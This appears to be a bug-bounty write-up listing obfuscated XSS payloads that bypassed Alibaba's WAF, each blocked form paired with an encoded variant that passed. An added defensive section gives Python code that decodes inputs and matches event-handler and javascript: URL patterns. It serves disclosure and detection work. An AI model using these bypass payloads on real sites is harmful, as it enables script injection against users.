Author: Rando02355205
(Paypal) www.paypal.com [CSP High Level] – [XSS Reflected] – [Bug Bounty] – [Write Up]
(Google) groups.google.com – [Stored XSS] – [Bug Bounty] – [WriteUp] – [24/02/2020]
XSS on “www.alibaba.com” (Alibaba WAF 405) Bypassed.
XSS WAF Bypassed
</script><svg onload=alert(1)> = (Error)
</script><!--><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)
</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)
<a href="javascript:alert(1)">href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D"%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;">href</a> = (OK)
<input value="testtest" onclick="alert(1)"> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)
<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)
'-confirm(1)-' = (Error)
<!'/!"/\'/\"/*/-top[`con\x66irm`]`1`//><svg> = (OK)
<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)
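Read from the defending side, the encoded pairs above pass because the `=`, `(` and `javascript:` a signature looks for only appear after the browser has percent-decoded and entity-decoded the value. The sketch below is an added example, not part of the original write-up and not a description of Alibaba's WAF: it canonicalizes first and then applies two structural rules. The rule names, function names and the benign sample are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed input: three "(OK)" strings from the list above, as a filter
# would see them in a request parameter, plus one harmless value.
SAMPLES = [
    '</script><!--><svg onload%3Da%3Dalert,b%3D1,[b].find(a)>',
    '</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;>',
    r'<A aAaAaAa AaAaAaA aAaA hReF%3D"%26%2301j%26%2365;v%26%2365;s%26%2399rIpT'
    r'%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;">href</a>',
    'how do I use the svg onload attribute?',
]

# Structural rules (hypothetical names): any on* attribute inside a tag, and
# any URL-bearing attribute whose value starts with the javascript: scheme.
RULES = {
    "event-handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.I),
    "javascript-url": re.compile(
        r"(?:href|src|formaction)\s*=\s*[\"']?[\x00-\x20]*javascript\s*:", re.I),
}

def canonicalize(value, max_rounds=5):
    """Percent-decode and entity-decode repeatedly until nothing changes."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def findings(value, decode=True):
    """Return the sorted names of the rules that match the value."""
    text = canonicalize(value) if decode else value
    return sorted(name for name, rule in RULES.items() if rule.search(text))

if __name__ == "__main__":
    # Columns: rules hit on the raw text, rules hit after decoding, sample.
    for sample in SAMPLES:
        print(findings(sample, decode=False), findings(sample), sample[:40])
```

Pattern rules like these are a detection heuristic and will produce false positives on free text; context-aware output encoding in the application remains the actual fix.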
Thank you, and best regards!!!